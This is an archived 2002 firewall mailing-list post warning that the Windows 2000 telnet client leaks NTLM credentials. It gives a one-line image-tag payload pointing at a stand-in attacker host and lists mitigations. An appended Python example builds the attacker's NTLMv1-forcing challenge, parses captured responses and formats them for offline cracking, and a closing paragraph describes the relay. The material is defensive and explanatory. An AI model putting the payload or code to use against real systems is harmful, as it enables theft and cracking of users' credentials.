Re: [fw-wiz] Danger of telnet on w2k (Was: re: Annoying pop-ups)

From: Mikael Olsson <mikael.olsson@clavister.com>
To: firewall-wizards@honor.icsalabs.com
Date: Wed Oct 30 14:20:02 2002



Mikael Olsson wrote:
>
> PLUS port 23 (Telnet!)
> Sure, it isn't on by default, but people found ways to abuse DCOM to
> turn it on remotely. Uh oh.

I just figured that this deserved a bit of extra mention. I'm sure that
most people think "Bah. I've got a good admin password, and I don't log
on via telnet anyway, so I'm safe".

If so, here's something you need to know: Microsoft embedded NTLM auth
in telnet in w2k. This means that, unless instructed to do otherwise,
the w2k telnet client will send out NTLM authentication data of the
currently logged on user whenever you telnet to an NTLM-enabled server.

This same data sent out can be relayed back to your box and used
to log on to you without delay. It can also be fed to l0phtcrack.

Microsoft did indeed send out an advisory about this two years ago,
but I figured it deserved another mention, seeing as how people still
tend to forget about this. All it needs is an image tag like
<img src="telnet://evilserver.int:2323">

Stuff that can help:

- Read http://www.microsoft.com/technet/security/bulletin/MS00-067.asp
  and install the patch. The patch is to display a warning before NTLM
  is sent to stuff outside the local zone. However, we have seen the zone
  schemes be subverted before, so don't rely on it.

- Block port 23 inbound to avoid the direct relay back to your telnet
  port. Disabling the telnet service might be a good idea, but don't
  rely on it.

- Run "telnet" without arguments. Type "unset ntlm".
  This prevents the telnet client from sending ntlm hashes at all.

- Blocking port 23 outbound will NOT help.

-- 
Mikael Olsson, Clavister AB
Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden
Phone: +46 (0)660 29 92 00   Mobile: +46 (0)70 26 222 05
Fax: +46 (0)660 122 50       WWW: http://www.clavister.com
Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..."


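The NTLM exchange Mikael describes, as an added example that is not part of the original post and not Microsoft's code: the attacker-side server's Type 2 challenge, a parser for the client's Type 3 reply, and the formatting of the captured response into the line an offline cracker takes (John the Ripper's netntlm/netntlmv2 formats, the modern equivalent of feeding it to l0phtcrack). The telnet AUTHENTICATION option negotiation that wraps these messages is assumed and left out; only the NTLMSSP messages inside it are built and parsed. The Type 3 message parsed here is constructed with dummy 24-byte responses, since a real one is computed from the user's LM/NT hashes. All names (build_type2, parse_type3, crack_line, EVILSRV, alice/CORP/WS01) are assumptions for illustration.

```python
"""Attacker-side view of the NTLM-over-telnet leak.

Constructed example (not the post's or Microsoft's code). The telnet
AUTHENTICATION option negotiation is omitted; what it carries are plain
NTLMSSP Type 2 (challenge) and Type 3 (authenticate) messages.
"""
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"

# NegotiateFlags bits as documented in MS-NLMP.
NEGOTIATE_UNICODE = 0x00000001
REQUEST_TARGET = 0x00000004
NEGOTIATE_NTLM = 0x00000200
NEGOTIATE_ALWAYS_SIGN = 0x00008000
TARGET_TYPE_SERVER = 0x00020000
NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000
NEGOTIATE_TARGET_INFO = 0x00800000

# A fixed challenge lets precomputed tables attack the responses;
# 0x1122334455667788 is the value such tables are conventionally built for.
STATIC_CHALLENGE = bytes.fromhex("1122334455667788")


def _field(length, offset):
    """NTLMSSP security buffer: len, maxlen, offset (all little-endian)."""
    return struct.pack("<HHI", length, length, offset)


def _read_field(msg, pos):
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, pos)
    return msg[offset:offset + length]


def build_type2(challenge=STATIC_CHALLENGE, target=b"EVILSRV"):
    """Type 2 challenge an attacker's telnet server (hypothetical 'EVILSRV') sends.

    NEGOTIATE_EXTENDED_SESSIONSECURITY is deliberately left out so a client
    that permits it answers with plain NTLMv1 responses, the cheapest to crack.
    """
    assert len(challenge) == 8
    flags = (NEGOTIATE_UNICODE | REQUEST_TARGET | NEGOTIATE_NTLM
             | NEGOTIATE_ALWAYS_SIGN | TARGET_TYPE_SERVER | NEGOTIATE_TARGET_INFO)
    target_name = target.decode("ascii").encode("utf-16-le")
    target_info = struct.pack("<HH", 0, 0)          # empty AV list: MsvAvEOL only
    header_len = 48                                  # fixed part of a Type 2 without Version
    return (NTLMSSP_SIG + struct.pack("<I", 2)
            + _field(len(target_name), header_len)
            + struct.pack("<I", flags)
            + challenge
            + b"\x00" * 8                            # Reserved
            + _field(len(target_info), header_len + len(target_name))
            + target_name + target_info)


def build_type3_sample(user="alice", domain="CORP", workstation="WS01",
                       lm_response=bytes(range(24)), nt_response=bytes(range(24, 48)),
                       flags=NEGOTIATE_UNICODE | NEGOTIATE_NTLM):
    """Constructed Type 3 with made-up responses (real ones are DES over the
    user's LM/NT hashes, which this example does not compute)."""
    strings = [s.encode("utf-16-le") for s in (domain, user, workstation)]
    items = [lm_response, nt_response] + strings + [b""]   # last: empty session key
    offset, fields, payload = 64, b"", b""                 # 12 + 6 buffers * 8 + flags 4
    for item in items:
        fields += _field(len(item), offset)
        payload += item
        offset += len(item)
    return NTLMSSP_SIG + struct.pack("<I", 3) + fields + struct.pack("<I", flags) + payload


def parse_type3(msg):
    """Pull user, domain, workstation and both challenge responses out of a Type 3."""
    if not msg.startswith(NTLMSSP_SIG) or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP Type 3 message")
    positions = (("lm_response", 12), ("nt_response", 20), ("domain", 28),
                 ("user", 36), ("workstation", 44))
    raw = {name: _read_field(msg, pos) for name, pos in positions}
    # Old clients end the header after these five buffers; newer ones add a
    # session-key buffer and the flags word. The lowest payload offset tells which.
    offsets = [off for _, pos in positions
               for ln, _m, off in [struct.unpack_from("<HHI", msg, pos)] if ln]
    flags = (struct.unpack_from("<I", msg, 60)[0]
             if offsets and min(offsets) >= 64 else NEGOTIATE_UNICODE)
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "cp437"
    return {
        "user": raw["user"].decode(enc),
        "domain": raw["domain"].decode(enc),
        "workstation": raw["workstation"].decode(enc),
        "lm_response": raw["lm_response"],
        "nt_response": raw["nt_response"],
        "ntlmv2": len(raw["nt_response"]) > 24,   # v2 responses carry a blob after the 16-byte proof
    }


def crack_line(parsed, challenge=STATIC_CHALLENGE):
    """Format a captured response for John the Ripper / hashcat."""
    user, domain = parsed["user"], parsed["domain"]
    lm, nt = parsed["lm_response"].hex(), parsed["nt_response"].hex()
    if parsed["ntlmv2"]:
        # netntlmv2 (hashcat 5600): user::domain:challenge:ntproof:blob
        return f"{user}::{domain}:{challenge.hex()}:{nt[:32]}:{nt[32:]}"
    # netntlm (hashcat 5500): user::domain:lmresp:ntresp:challenge
    return f"{user}::{domain}:{lm}:{nt}:{challenge.hex()}"


if __name__ == "__main__":
    print(build_type2().hex())
    print(crack_line(parse_type3(build_type3_sample())))
```

Because the server picks the challenge, the same captured Type 3 can either be cracked offline (crack_line) or, as the post says, relayed: the attacker feeds the victim's own server a Type 1, forwards that server's challenge to the victim in place of STATIC_CHALLENGE, and passes the resulting Type 3 back unchanged.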